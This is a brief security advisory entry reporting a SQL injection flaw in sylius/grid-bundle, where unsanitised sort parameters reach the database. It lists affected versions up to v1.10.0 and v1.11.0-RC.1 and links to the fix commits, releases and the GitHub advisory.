sylius/grid-bundle is vulnerable to SQL Injection attacks. The library directly passes the values added at the end of query sorting to the database, allowing a malicious user to inject and execute arbitrary SQL queries on the system.
CPE | Name | Operator | Version |
---|---|---|---|
sylius/grid-bundle | le | v1.10.0 | |
sylius/grid-bundle | le | v1.11.0-RC.1 | |
sylius/grid-bundle | le | v1.10.0 | |
sylius/grid-bundle | le | v1.11.0-RC.1 |
github.com/Sylius/SyliusGridBundle/commit/73d0791d0575f955e830a3da4c3345f420d2f784
github.com/Sylius/SyliusGridBundle/commit/b702009975bcf8dd869bb6f5e619ea93c454f48b
github.com/Sylius/SyliusGridBundle/pull/222
github.com/Sylius/SyliusGridBundle/releases/tag/v1.10.1
github.com/Sylius/SyliusGridBundle/releases/tag/v1.11.0-RC.2
github.com/Sylius/SyliusGridBundle/security/advisories/GHSA-2xmm-g482-4439